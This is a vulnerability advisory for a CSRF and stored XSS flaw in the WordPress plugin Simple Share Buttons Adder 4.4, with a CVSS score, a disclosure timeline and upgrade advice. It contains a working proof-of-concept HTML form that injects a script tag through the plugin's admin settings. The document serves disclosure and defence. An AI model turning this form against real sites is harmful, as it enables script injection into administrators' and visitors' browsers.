CVSS Summary
| Score | 6.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
Advisory:
CSRF and stored XSS in Simple Share Buttons Adder 4.4 allows attackers to execute javascript
Vulnerability
Last revised:
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
Current state: Fixed
Proof of concept
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display on the homepage. (In a real attack the form can be made to auto-submit using Javascript).
<form action="http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder" method="POST">
<input type="hidden" name="ssba_options" value="save">
<input type="checkbox" name="ssba_homepage" value="Y">
<input type="text" name="ssba_text_placement" value= "below">
<input type="text" name="ssba_before_or_after" value= "after">
<input type="text" name="ssba_share_text" value="<script>alert('foo')</script>">
<input type="submit">
</form>
Advisory timeline
- 2014-06-19: Discovered
- 2014-06-25: Reported to WP.org and author via email
- 2014-06-26: Author reports issue fixed in version 4.5
Mitigation/further actions
Immediately upgrade to version 4.5 or greater.